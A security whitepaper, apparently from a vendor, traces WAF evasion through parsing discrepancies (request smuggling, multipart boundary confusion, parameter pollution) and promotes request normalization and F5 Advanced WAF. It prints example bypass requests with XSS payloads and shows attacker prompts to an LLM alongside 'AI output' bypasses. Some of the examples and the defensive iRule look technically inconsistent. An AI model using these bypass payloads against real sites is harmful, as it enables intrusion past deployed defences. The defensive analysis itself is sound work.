← All articles

Whitepaper

From Smuggling to Normalization: The Evolution of Parsing Discrepancy Attacks and the Future of Gen AI WAF Evasion

Abstract

Web Application Firewalls (WAFs) are widely deployed classification engines designed to filter malicious HTTP traffic, providing a scalable layer of automated threat management against common web vulnerabilities such as SQL injection and Cross-Site Scripting (XSS).

However, their efficacy is fundamentally constrained by their reliance on syntactic pattern matching and the assumption of consistent request parsing across the web stack.

Over the past two decades, attackers have systematically exploited parsing discrepancies between intermediaries — such as reverse proxies, WAFs, and backend application frameworks — to evade detection.

This paper traces the evolution of these attacks from the early 2000s, when Linhart et al. first documented HTTP Request Smuggling (HRS), to James Kettle’s 2020 revival of the technique, to the recent WAFFLED study, which reveals how content-level parsing inconsistencies in multipart/form-data, application/json, and application/xml enable stealthy bypasses.

We then examine Bruno Mendes’ autonomous pentest, which weaponizes HTTP Parameter Pollution (HPP) to bypass even strict WAFs. We demonstrate a clear lineage: from request smuggling, to semantic smuggling, to structure-aware evasion — each exploiting deeper layers of parsing divergence. Looking ahead, we argue that AI-augmented, grammar-driven fuzzing will accelerate the discovery of such discrepancies, making parsing fidelity a critical security property. In response, we reaffirm strict RFC compliance and request normalization — exemplified by tools like HTTP-Normalizer — as the only sustainable defense.

This work unifies decades of offensive security research under a single principle:

Differential parsing is a first-class attack surface.


1. Introduction

Web Application Firewalls (WAFs) have become ubiquitous in modern web infrastructure, acting as gatekeepers between clients and applications by filtering malicious traffic based on predefined rules. Despite their widespread adoption, WAFs are not immune to evasion. Traditional bypass techniques — such as payload obfuscation, encoding, or character insertion — have long been known and increasingly exploited [Pickles, 2025].

The real threat, however, has never been obfuscation — it has been differential parsing: the exploitation of inconsistencies in how different components in the request chain interpret HTTP syntax.

This attack surface is not new. As early as 2005, Linhart et al. documented HTTP Request Smuggling (HRS), demonstrating how discrepancies in Content-Length and Transfer-Encoding parsing could allow request smuggling past intermediaries [Linhart et al., 2005]. Just four years later, Stefano di Paola and Luca Carettoni introduced HTTP Parameter Pollution (HPP) at OWASP EU09, showing how duplicate parameters could be used to bypass input validation by exploiting inconsistent framework behavior [di Paola & Carettoni, 2009].

For years, these techniques remained niche — limited by the speed and creativity of human researchers. But in 2020, James Kettle reignited the field with his seminal work on HTTP Desync Attacks [Kettle, 2020]. Kettle did not invent HRS — but he reintroduced it, systematized it, and demonstrated its real-world impact against modern cloud architectures.

This paper traces that evolution:

  • 2005 – 2009: The discovery of parsing discrepancies (HRS, HPP)
  • 2020: Kettle’s revival and operationalization of HRS
  • 2024 – 2025: The human-scale peak (WAFFLED, Mendes)
  • 2025+: The AI explosion

We conclude by reaffirming HTTP-Normalizer as the only viable defense: enforce strict RFC compliance.


2. The Genesis: From Linhart to Kettle — The Reintroduction of HRS

While Linhart et al. (2005) first documented HTTP Request Smuggling, their work remained largely theoretical and underappreciated in the broader security community. For over a decade, HRS was treated as a curiosity - an edge case of HTTP parsing, not a practical attack vector.

That changed in 2020, when James Kettle published HTTP Desync Attacks: Smuggling Without the Smuggle [Kettle, 2020]. Kettle’s work was not a discovery - it was a reintroduction and weaponization of HRS for the modern web.

2.1 Kettle’s Contribution: Operationalizing HRS

Kettle’s key insight was that modern web stacks - cloud providers, CDNs, reverse proxies - had reintroduced the very parsing ambiguities that made HRS possible. He demonstrated this across:

  • Cloudflare
  • AWS
  • Azure
  • NGINX-based WAFs

His methodology was rigorous:

  • Black-box testing: No source code access.
  • Automated desync detection: Using timing and response anomalies.
  • Real-world impact: Session hijacking, cache poisoning, direct access to internal APIs.

Kettle didn’t just show that HRS was possible - he showed it was widespread, exploitable, and devastating.

2.2 The Legacy of Kettle’s Work

Kettle’s paper did more than expose vulnerabilities - it reframed WAF security. He showed that:

  • Parsing consistency is a first-class security property.
  • The WAF is not a firewall - it’s a parser, and if it parses differently than the backend, it fails.

This insight laid the foundation for all subsequent work on parsing discrepancies, including WAFFLED and HPP.

As Kettle himself noted:

“The problem isn’t that people are bad at parsing HTTP - it’s that they’re inconsistent.”


3. The Differential Parsing Spectrum: From Message Framing to Parameter Semantics

The history of WAF evasion is not a series of isolated tricks - it is the unfolding of a single vulnerability class: differential parsing. At its core, every successful WAF bypass exploits a semantic gap between how a WAF interprets an HTTP request and how the backend framework or interpreter processes it.

This paper unifies three generations of attacks under this principle:

  1. HTTP Request Smuggling (HRS): Exploits differences in message framing (e.g., Content-Length vs Transfer-Encoding).
  2. WAFFLED: Exploits differences in content structure (e.g., multipart/form-data boundaries, application/json field wrappers).
  3. HTTP Parameter Pollution (HPP): Exploits differences in parameter interpretation (e.g., ASP.NET’s comma concatenation of duplicate parameters).

Each attack shifts focus deeper into the request structure, but all rely on the same mechanism: the WAF sees a benign request; the backend sees a malicious one.

3.1 A Unified Taxonomy of Parsing Discrepancies
A Unified Taxonomy of Parsing Discrepancies
Layer Attack Type Parsing Discrepancy Example WAF Interpretation Web Server Interpretation
Message Framing HRS (Linhart/Kettle) Content-LengthvsTransfer-Encoding Chunked smuggling Sees two requests Sees one request with embedded payload
Content Structure WAFFLED Boundary continuation (boundary*0 = real-; boundary*1 = boundary) Multipart smuggling Uses boundary = fake Concatenates boundary*0 + boundary*1real - boundary
Parameter Semantics HPP (Mendes) Duplicate parameter handling q=1'&q = alert(1)&q='2 Scans each q in isolation Concatenates → 1',alert(1),'2 → valid JS
Header Processing HPACK Smuggling (Future) HTTP/2 header compression Compressed :path Decodes to /admin Decompresses to /etc/passwd
Cache Key Normalization Cache Poisoning Case sensitivity in query params ?q = test vs ?Q = test Treats as same key Treats as different endpoints

This table reveals a spectrum of parsing divergence, from syntactic framing to semantic execution. The attacker’s goal is always the same: to make the WAF parse less than the backend.

3.2 The Common Mechanism: Semantic Smuggling

All three attacks - HRS, WAFFLED, HPP - are forms of semantic smuggling:

  • The payload is not obfuscated.
  • The request is syntactically valid.
  • The attack succeeds only if the backend parses it correctly.

The evasion comes not from hiding the payload, but from structuring the request so that the WAF and backend disagree on what the payload is.

Example: HPP as Semantic Smuggling

In a recent pentest, Bruno Mendes [Mendes, 2025] demonstrated how HPP can bypass even strict WAF configurations on an ASP.NET application:

GET /search?q=1'&q=alert(1)&q='2 HTTP/1.1

  • WAF: Scans each q parameter in isolation. Sees alert(1) but misses context.
  • Backend (ASP.NET): Concatenates values: 1',alert(1),'2
  • Reflected in JavaScript:

userInput = '1',alert(1),'2';

  • → Valid, executable code via the comma operator.

Like WAFFLED, this is not obfuscation — it’s protocol-level smuggling, where the attack is assembled only at the application layer.

Historical Note: While this paper focuses on a recently published variant, HTTP Parameter Pollution (HPP) was first introduced as an inspection evasion method by Stefano di Paola and Luca Carettoni at the OWASP EU09 conference in 2009 [di Paola & Carettoni, 2009]. Their work laid the foundation for understanding how inconsistent parameter handling could be exploited, a principle now weaponized in modern WAF bypasses.


4. The Next Wave: WAFFLED and Content Parsing Discrepancies

While HRS targeted message framing, WAFFLED [Jabiyev et al., 2024] shifts focus to content parsing - how WAFs and web frameworks interpret structured payloads like JSON, XML, and multipart forms.

4.1 Core Insight

WAFFLED observes that:

  • Reverse proxies and WAFs often use simplified or incomplete parsers for performance or compatibility.
  • Backend frameworks (e.g., Flask, Spring Boot) use full-featured, standards-compliant parsers.
  • This creates a semantic gap: the WAF may miss a malicious payload because it misparses the container, while the backend parses it correctly and executes the attack.

Crucially, the payload remains unmodified. The evasion comes not from obfuscation, but from manipulating the structure around it.

4.2 Methodology

WAFFLED uses a grammar-based fuzzer (T-Reqs) to generate syntactically valid but semantically tricky requests. It mutates:

  • multipart/form-data boundaries and headers
  • application/json field wrappers and quotes
  • application/xml DOCTYPE and schema constructs

It then tests whether:

  1. The WAF allows the request
  2. The backend successfully parses and executes the payload (e.g., XSS)
4.3 Key Findings
  • 1,207 unique bypasses across 5 WAFs (Cloudflare, AWS, Azure, Google Cloud Armor, ModSecurity) and 7 frameworks
  • Multipart boundary confusion is especially effective (e.g., using boundary*0=real-;boundary*1=boundary to exploit RFC 2231 continuation)
  • Over 90% of real-world sites accept both x-www-form-urlencoded and multipart/form-data interchangeably, making multipart-based bypasses widely applicable
4.4 Example: Multipart Boundary Smuggling

POST / HTTP/1.1
Host: victim.com
Content-Type: multipart/form-data;
boundary=fake;boundary*0=real-;boundary*1=boundary

--fake
Content-Disposition: form-data; name="field1"
value1
--fake--

--real-boundary
Content-Disposition: form-data; name="xss"
<script>alert(1)</script>
--real-boundary--

  • WAF sees boundary=fake, ignores the rest, and misses the XSS
  • Backend concatenates boundary*0 and boundary*1real-boundary, parses the XSS, and executes it

This is not payload obfuscation - it’s parser confusion.


5. Not All WAFs Are Equal: Architecture as the Decisive Factor

The discovery of 1,207 bypasses in WAFFLED and the widespread failure on HPP suggest a universal WAF failure. But a closer look reveals a more nuanced truth: not all WAFs are equally vulnerable, and architecture determines resilience.

While many WAFs fail due to shallow, inline parsing, others resist these attacks by adopting a layered, protocol-aware parsing model.

5.1 The Shallow Parsing Problem: Reverse Proxy-WAF Parsing Gaps

The vulnerability often lies not in the WAF itself, but in the parsing behavior of the preceding reverse proxy or load balancer.

In most production architectures, the request chain is:

Client → [Reverse Proxy] → [WAF] → [Application]

The reverse proxy (e.g., NGINX, AWS ALB, Azure Application Gateway) terminates TLS, reassembles chunked requests, and normalizes headers and paths before forwarding the request to the WAF.

This creates a three-layer parsing chain, where:

  • The reverse proxy performs initial parsing
  • The WAF inherits the proxy’s interpretation
  • The backend may parse differently

If the proxy parses differently than the backend, the WAF inherits the gap - even if it parses correctly.

Layer Proxy Behaviour WAF Consequence
Message Framing Misreads Transfer-Encoding, fails to reassemble chunks WAF sees a clean request; HRS bypass succeeds
Content Structure Skips multipart/form-data parsing, treats body as opaque WAF scans flat string; misses smuggled XSS
Parameter Semantics Passes duplicate parameters unmodified WAF sees fragments; backend concatenates (ASP.NET) → HPP bypass

This explains why AWS WAF, Azure WAF, and NGINX App Protect — despite robust rule engines — are vulnerable to WAFFLED and HPP:

The proxy (ALB, Application Gateway, NGINX) does not normalize the request in a way that exposes the ambiguity to the WAF.

5.2 F5 Advanced WAF: Deep Parsing as Defense

F5’s Advanced WAF (AWAF) exemplifies a different architectural philosophy: deep, multi-layered, protocol-aware parsing.

Rather than a single inspection pass, AWAF uses the Traffic Management Microkernel (TMM) to:

  • Decouple normalization from inspection
  • Parse each protocol layer independently (HTTP, URI, headers, body)
  • Apply canonicalization before policy enforcement

This layered approach allows AWAF to understand the structure of the request - not just scan it - making it inherently more resilient to content-level parsing discrepancies like those exploited in WAFFLED.

Why F5 Resists WAFFLED-Style Bypasses

AWAF treats the HTTP request as a structured object, breaking it down into discrete, analyzable components:

  • URLs: Fully parsed and normalized, including path, query string, and fragments
  • Headers: Individually extracted and validated
  • Body Content: For multipart/form-data, the body is split into discrete parts, with each Content-Disposition, filename, and content-type validated independently
  • Nested Encodings: Pluggable decoders handle double URL-encoding, UTF-8 obfuscation, and other encodings before rule evaluation
  • Boundary Handling: Supports RFC 2231 continuation (boundary*0=real-;boundary*1=boundary) and correctly reconstructs the boundary for inspection

As a result, WAFFLED-style attacks — where the WAF misparses the boundary and misses the payload — are unlikely to succeed. AWAF sees the same boundary the backend does, and inspects the same payload.

“Canonicalization is not trivial — it’s a critical part of security logic.”

— Peter Scheffler, F5 [Scheffler, 2025]

Two Distinct Strategies for HPP: Security Policy vs. Semantic Emulation

When it comes to HTTP Parameter Pollution (HPP), F5’s architecture separates security enforcement from semantic emulation - a distinction that is both technically sound and operationally critical.

Strategy 1: Security Policy - Block or Isolate Duplicates (Recommended Default)

F5 AWAF allows administrators to enforce a strict security policy on duplicate parameters via the WAF policy configuration:

  • Go to Security > Application Security > Parameters
  • Set "Multiple Query Parameters" to "Reject" or "Use First/Last"

This is the recommended default for most applications, as it:

  • Closes the HPP attack vector at the gate
  • Prevents exploitation of backend-specific parsing quirks
  • Aligns with the principle of least privilege

As Peter Scheffler notes:

“If your WAF is making assumptions about how the app interprets paths — you’re flying blind.”

Blocking duplicate parameters is not a parsing decision — it’s a security decision. And in the absence of a known, required backend behavior, rejecting ambiguity is the only safe choice.

Strategy 2: Semantic Emulation - Framework-Specific Parameter Combination (By Exception)

In cases where an application explicitly requires duplicate parameters (e.g., legacy ASP.NET apps), blocking is not an option. Here, F5’s architecture enables a second, advanced layer: semantic emulation via iRules.

Unlike the WAF policy — which operates on isolated parameters — an iRule can pre-process the request to mimic the backend’s parsing behavior before inspection.

This is not “parsing” — it’s emulation. And it’s where F5’s flexibility shines.

Example iRule: Simulate ASP.NET’s q=a&q=bq=a,b (Comma Concatenation)

when HTTP_REQUEST {
    #List of parameters that should be comma-concatenated (ASP.NET behavior)
    set target_params [list "q" "search" "input"]

    # Rebuild query string
    set new_query ""
    foreach {name value} [split [HTTP::query] &] {
        if { $name eq "" } { continue }

        # URL decode the name for comparison
        set decoded_name [URI::decode $name]

        if { [lsearch $target_params $decoded_name] != -1 } {
            # Collect all values for this parameter
            set all_values [list]
            foreach {k v} [split [HTTP::query] &] {
                if { [URI::decode $k] eq $decoded_name } {                     append all_values [URI::decode $v]
                }
            }
            # Concatenate with comma (ASP.NET behavior)
            set combined_value [join $all_values ","]
            # Avoid duplicates in the new query
            if { [lsearch $target_params $decoded_name] == [lsearch -exact $target_params $decoded_name] } {
                append new_query "&$name=$combined_value"
            }
        } else {
            # Pass through other params unchanged
            append new_query "&$name=$value"
        }
    }

    # Remove leading & if present
    if { [string length $new_query] > 0 } {
        set new_query [string range $new_query 1 end]
    }
    # Rewrite the query string
    if { $new_query ne [HTTP::query] } {
        HTTP::query $new_query
        log local0. "HPP: Normalized query to '$new_query' (ASP.NET emulation)"
    }
}

How It Works:
  • Intercepts the request before the WAF policy is applied
  • For specified parameters (e.g., q), collects all values
  • Concatenates them with commas, mimicking HttpUtility.ParseQueryString()
  • Rewrites the query string so the WAF sees the same thing the backend will

This ensures that XSS rules inspect the final, concatenated value, not fragmented pieces.

Use Case:
  • Legacy ASP.NET applications that rely on comma-concatenated parameters
  • High-risk assets where HPP bypass is a known threat
  • Applications where blocking duplicates would break functionality

Note: This iRule should be applied only to specific applications, not globally.


5.3 The Limits of Any Classification Device

Even F5’s robust architecture cannot guarantee 100% immunity. Why?

  1. The Backend is a Moving Target: Frameworks evolve
  2. Custom Parsers Are Unpredictable: Many applications use custom or third-party parsers that deviate from RFCs
  3. AI-Driven Evasion Is Coming: As discussed in Section 6, GenAI-powered fuzzers could generate novel, RFC-adjacent mutations that exploit edge cases even in deep parsers.
  4. Performance vs. Security Trade-offs: Deep parsing is expensive. In high-throughput environments, WAFs may disable full body parsing — reintroducing the very gaps WAFFLED exploits.
  5. Semantic Emulation Is Not Built-In: While F5 supports policy enforcement and custom emulation via iRules, it does not automatically simulate backend-specific parameter handling (e.g., ASP.NET concatenation) out of the box. This must be explicitly configured.

Thus, while F5 AWAF represents a best-in-class defense, it remains a classification device — and all classifiers can be fooled by adversarial input.

But unlike many WAFs, F5 gives defenders the tools to close the gap:

  • Security policy to block ambiguity
  • iRules to emulate semantics
  • Deep parsing to normalize structure

As Peter Scheffler (F5) emphasizes:

“Canonicalization is not trivial — it’s a critical part of security logic.”

And in the age of AI-driven evasion, only a platform that supports both policy and emulation can hope to keep pace.


6. The Next Generation: AI-Augmented Semantic Parsers

The evolution of WAF evasion — from HRS to WAFFLED to HPP — reveals a consistent pattern: the attacker wins by exploiting a semantic gap between how the WAF thinks the request will be parsed and how the backend actually parses it.

Traditional defenses have responded with stricter syntax enforcement (e.g., HTTP-Normalizer) and deeper parsing layers (e.g., F5 AWAF). These are essential, but they are still reactive and static — they rely on known RFCs, fixed parser logic, and manual rule updates.

The next frontier is not just deep parsing, but intelligent parsing — a new class of AI-augmented semantic parsers that go beyond syntax to understand, predict, and emulate how a backend will interpret a request.

6.1 The Limitations of Rule-Based and RFC-Compliant Parsers

Even the most robust WAFs today operate within a closed-world assumption: they parse based on:

  • RFC specifications (e.g., ABNF for multipart/form-data)
  • Known framework behaviors (e.g., Flask vs. Spring Boot)
  • Predefined normalization rules

This works well for known discrepancies, but fails when:

  • A framework introduces a new parsing quirk
  • A custom parser is used (e.g., a proprietary XML handler)
  • An attacker combines multiple edge cases in novel ways (e.g., HPP + boundary confusion + encoding)

As Bruno Mendes’ hackbot demonstrated, heuristic-driven automation can bypass even ML-based WAFs in seconds by exploiting subtle parsing differences that static rules cannot anticipate.

Thus, the future of WAFs must move beyond pattern matching and syntax normalization to semantic reasoning.

6.2 Introducing the AI Semantic Parser

An AI-augmented semantic parser is not a replacement for RFC compliance, but a cognitive layer that enhances it. It combines:

  • Formal grammar parsing (ABNF, RFCs)
  • Machine learning models trained on parser behavior
  • Framework-specific emulation
  • Real-time feedback from backend responses

Its goal: to simulate not just what the backend will parse, but how and why.

Key Capabilities:
Capability Description
Framework Behavior Modeling Trained on open-source parser code (e.g.,HttpUtility.ParseQueryString in ASP.NET), API documentation, and real-world traffic to predict how duplicate parameters, boundary continuations, or JSON field wrappers will be handled.
Cross-Format Generalization Learns analogies across content types (e.g., boundary confusion in multipart↔ delimiter confusion in JSON↔ entity termination in XML).
Differential Parsing Prediction Given a request, predicts whether the WAF and backend will interpret it differently - flagging high-risk requests before they reach the application.
Adaptive Normalization Instead of applying one-size-fits-all rules, it normalizes based on the target framework(e.g., if the backend is ASP.NET, it simulates comma concatenation of q parameters).
Autonomous Fuzzing & Defense Co-Training Uses reinforcement learning to generate adversarial requests, then uses the results to improve its own parsing logic - creating a self-hardening system.

6.3 GenAI as the Universal Fuzzer: Prompt Engineering as Offensive Security

The breakthrough is not the attack — it’s the automation.

Large Language Models (LLMs), trained on:

  • RFC specifications
  • Open-source parser code (Flask, Spring, ASP.NET)
  • Public bypass databases (PayloadsAllTheThings)
  • Real-world traffic patterns

…can now generate novel, RFC-adjacent bypasses with minimal prompting.

Prompt 1: Multipart Boundary Smuggling (WAFFLED++)

Prompt:

"Generate a multipart/form-data request that uses boundary*0 and boundary*1 continuation to define a real boundary that the WAF ignores but the backend concatenates. Use null bytes and linefeed removal to increase stealth. Target: Laravel backend, Cloudflare WAF."

AI Output:

POST /upload HTTP/1.1
Host: victim.com
Content-Type: multipart/form-data;
  boundary=fake\x00;boundary*0=real-;boundary*1=boundary

--fake
Content-Disposition: form-data; name="file"
innocent
--fake--

--real-boundary
Content-Disposition: form-data; name="xss"
<script>alert(1)</script>
--real-boundary--

Why it works:

  • WAF sees boundary=fake, ignores continuation
  • Laravel concatenates boundary*0 + boundary*1real-boundary
  • Null byte in header confuses WAF parsing
Prompt 2: HPP + JSON Obfuscation (HPP++)

Prompt:

"Create a JSON-based XSS bypass using HTTP Parameter Pollution. The backend is ASP.NET and reflects user input in a JavaScript context. Use duplicate data parameters to split the payload and avoid WAF detection. Include string concatenation and new Function() for obfuscation."

AI Output:

GET /api/search HTTP/1.1
Host: victim.com
Content-Type: application/json
{"data":"1'"}&{"data":"asd=window"}&{"data":"def='al'+'ert'"}&{"data":"asd[def](1)"}

When reflected:

userInput = '1',asd=window,def='al'+'ert',asd[def](1);

→ Executes alert(1).

Why it works:

  • Each fragment is benign
  • ASP.NET concatenates → valid JS
  • WAF sees no alert or document.cookie
Prompt 3: Cross-Layer Smuggling (HRS + HPP + WAFFLED)

Prompt:

"Design a hybrid attack that combines HTTP Request Smuggling, HTTP Parameter Pollution, and multipart boundary confusion. The goal is to smuggle a request that uses HPP to bypass a WAF and deliver an XSS via a multipart body with a crafted boundary. Target: AWS WAF with OWASP CRS 3.0, backend: Spring Boot."

AI Output (simplified):

POST / HTTP/1.1
Host: victim.com
Content-Length: 150
Transfer-Encoding: chunked


0


GET /search?q=1'&q=alert(1)&q='2 HTTP/1.1
Content-Type: multipart/form-data; boundary=fake;boundary*0=real-;boundary*1=boundary

--real-boundary
Content-Disposition: form-data; name="xss"
<script>alert(1)</script>
--real-boundary--

Why it works:

  • HRS smuggles the request past the WAF
  • HPP bypasses XSS rules
  • Multipart boundary confusion hides the payload
    • 6.4 The Rise of the Hackbot

      Bruno Mendes’ autonomous pentest engine demonstrated that AI-driven systems can bypass even "unbeatable" WAFs in seconds. His hackbot:

      • Bypassed Azure WAF with a simple payload: test\\';alert(1);//
      • Found a bypass for open-appsec in 30 seconds
      • Adapted when blocked, switching from alert(1) to confirm(1)

      This is not hypothetical - it is the present.

      And the prompt is the new exploit.


      7. Other Shadows of Differential Parsing

      The principle of differential parsing extends beyond HTTP/1.1. As web protocols evolve, so do the parsing attack surfaces.

      7.1 HTTP/2 and HPACK Smuggling

      HTTP/2 uses HPACK compression to reduce header size. A WAF that decompresses headers differently than the backend could allow smuggling.

      7.2 gRPC and Protocol Buffer Parsing

      gRPC uses Protocol Buffers, which allow field name-to-number mapping. A WAF that doesn’t decode protobufs may miss malicious fields.

      7.3 GraphQL Query Parsing

      GraphQL allows complex nested queries. A WAF that parses only the outer structure may miss malicious resolvers embedded in deep fields.

      7.4 Cache Key Normalization

      CDNs and reverse proxies often normalize cache keys (e.g., lowercase query params). If the WAF and CDN disagree, an attacker could poison the cache.


      8. Toward a New Evaluation Metric: Parsing Fidelity

      Given these realities, we propose Parsing Fidelity as the key metric for evaluating WAFs:

      Parsing Fidelity = The degree to which a WAF’s parsing model matches the backend framework’s behavior.

      A WAF with high parsing fidelity:

      • Uses the same parser libraries as the framework
      • Applies identical canonicalization rules
      • Validates before inspecting, not the other way around

      This aligns with HTTP-Normalizer, but pushes it further: the WAF should not just normalize — it should emulate.


      9. Defense: The Case for HTTP-Normalizer

      If the attack is differential parsing, the defense must be uniform parsing.

      The WAFFLED study [Jabiyev et al., 2024] proposes HTTP-Normalizer, a proxy that:

      • Rejects non-RFC-compliant requests
      • Normalizes valid requests to a canonical form
      • Eliminates ambiguity before the WAF sees the request
        • This is not a new idea - it’s a return to first principles: if security depends on consistent parsing, then the only safe parser is one that adheres strictly to standards.

          But HTTP-Normalizer is not just theory. It has real-world analogs — most notably, F5’s Advanced WAF (AWAF).

          F5 AWAF, with its Traffic Management Microkernel (TMM) and deep, multi-layered parsing model, embodies the HTTP-Normalizer philosophy in practice:

          • It decouples normalization from inspection
          • It parses each protocol layer independently (headers, body, parameters)
          • It applies canonicalization before policy enforcement

          In this sense, F5 AWAF is not just a WAF — it is a production-ready HTTP-Normalizer, enforcing parsing fidelity at scale.

          9.1 How HTTP-Normalizer Works

          HTTP-Normalizer operates as a pre-WAF proxy or integrated parsing layer that:

          1. Parses requests using strict ABNF grammars derived from RFCs.
          2. Rejects malformed, deprecated, or ambiguous constructs (e.g., non-conformant boundaries, invalid encodings).
          3. Re-serializes clean requests with standardized headers, structure, and encoding.

          This ensures that:

          • The WAF sees a canonical, unambiguous request
          • The backend sees the same request the WAF saw
          • The semantic gap is eliminated at the source

          As Peter Scheffler (F5) notes:

          “Canonicalization is not trivial - it’s a critical part of security logic.”

          And in a world of AI-driven evasion, only strict normalization can prevent exploitation.

          9.2 Why It Works

          All 1,207 WAFFLED bypasses rely on non-compliant or edge-case parsing — requests that are syntactically valid enough to pass through a lenient WAF, but structured to confuse its parser.

          By enforcing strict RFC adherence, HTTP-Normalizer:

          • Blocks malformed boundaries (e.g., boundary*0=real-;boundary*1=boundary without proper continuation handling)
          • Removes null bytes, malformed headers, and linefeed tricks
          • Standardizes encoding and structure

          The result: all known WAFFLED-style bypasses are prevented — not because the WAF has better rules, but because the attack surface is removed before inspection.

          Key Insight: The cost of parsing flexibility is security debt.

          9.3 Can HTTP-Normalizer Mitigate HPP?

          Not by default - but it can be extended to do so.

          RFC 3986 does not define how duplicate parameters should be handled. Different frameworks interpret them differently:

          • ASP.NET: q=a&q=bq=a,b
          • PHP: q=a&q=bq=b (last wins)
          • Node.js: q=a&q=bq=['a','b']

          This means there is no single "correct" parsing behavior at the HTTP level — it’s framework-dependent.

          However, HTTP-Normalizer (or a system like F5 AWAF) can be enhanced with a Parameter Normalization Policy:

          Policy Description Use case
          Reject duplicates Block any request with repeated parameters Default, secure posture
          Use first/last Normalize to first or last occurrence Legacy apps with array-like behavior
          Simulate framework behavior Concatenate with commas (ASP.NET), or build arrays (Node.js) High-risk apps requiring deep emulation

          This would force uniformity between the WAF and the backend, closing the HPP gap.

          9.4 F5 AWAF as a Real-World HTTP-Normalizer

          F5’s Advanced WAF is not just a WAF - it is a practical implementation of the HTTP-Normalizer concept.

          It demonstrates that:

          • Deep parsing is feasible at scale
          • Normalization before inspection works
          • Parsing fidelity can be enforced in production

          And while it doesn’t automatically emulate ASP.NET-style parameter concatenation, it provides the tools to do so:

          • iRules for custom pre-processing
          • Strict parameter handling policies
          • Pluggable decoders for encoding normalization

          This makes F5 AWAF a model for how HTTP-Normalizer could be deployed — not as a standalone tool, but as an integrated, enterprise-grade parsing layer.

          9.5 Integration Path

          HTTP-Normalizer — whether as a standalone tool or embodied in systems like F5 AWAF — can be deployed as:

          • A pre-WAF proxy in front of any WAF
          • A hardened parser module within the WAF engine
          • An iRule or policy extension in platforms like F5
          • A developer validation tool in CI/CD pipelines

          The goal is the same: eliminate parsing ambiguity before it can be exploited.


          10. Conclusion

          The history of WAF evasion is a story of escalating parsing sophistication:

          1. Obfuscation (hide the payload) → defeated by signature updates
          2. Smuggling (hide the request) → defeated by desync detection
          3. Semantic smuggling (hide the meaning) → requires uniform parsing

          WAFFLED and HPP represent a pivotal moment: the realization that content and parameter parsing are as critical as message framing. They prove that thousands of real, exploitable bypasses exist not because of broken rules, but because of broken parsing.

          The future will bring AI-driven fuzzing that automates the discovery of such gaps. But the defense is clear: enforce RFC compliance. Tools like HTTP-Normalizer show that all known bypasses are preventable.

          As web protocols grow more complex, the only sustainable security strategy is simplicity through standardization. The era of lenient, forgiving parsers must end - before the next generation of AI-powered attacks makes it impossible.



          References

          • Linhart, C., et al. (2005). HTTP Request Smuggling.
          • Pickles, S. (2025). A Comprehensive Review of WAF Evasion and Obfuscation Techniques. https://sikasecurity.com/a-comprehensive-review-of-waf-evasion-and-obfuscation-techniques
          • Kettle, J. (2020). HTTP Desync Attacks: Smuggling Without the Smuggle. PortSwigger.
          • Jabiyev, U., et al. (2024). WAFFLED: Uncovering WAF Evasion via Content Parsing Discrepancies. https://arxiv.org/html/2503.10846v1
          • Stefano di Paola and Luca Carettoni (2009). HTTP Parameter Pollution. OWASP EU09 conference in Poland.
          • Mendes, B. (2025). Autonomosly Bypassing WAFs for Fun and JS Injection with Parameter Pollution. https://blog.ethiack.com/blog/bypassing-wafs-for-fun-and-js-injection-with-parameter-pollution
          • Grenfeldt, T., et al. (2021). HTTP Request Smuggling in Modern Web Stacks.
          • Bray, T. (2017). The JavaScript Object Notation (JSON) Data Interchange Format. RFC 8259.
          • Freed, N., & Borenstein, N. (1996). Multipurpose Internet Mail Extensions (MIME). RFC 2045–2047.
          • Moore, K. (1996). MIME (Multipurpose Internet Mail Extensions) Part Three: Message Header Extensions for Non-ASCII Text in Internet Messages. RFC 2047.
          • Thompson, H., & Lilley, C. (2014). XML Media Types. RFC 7303.
          • Crocker, D., & Overell, P. (2008). Augmented BNF for Syntax Specifications: ABNF. RFC 5234.
          • Scheffler, P. (2025). WAFFleD Attack vs F5 Advanced WAF. F5 Blog.
          • F5. (2025). Distributed Cloud Web App Scanning. https://www.f5.com/products/distributed-cloud-services/web-app-scanning

Contact us

Get prepared — contact us today.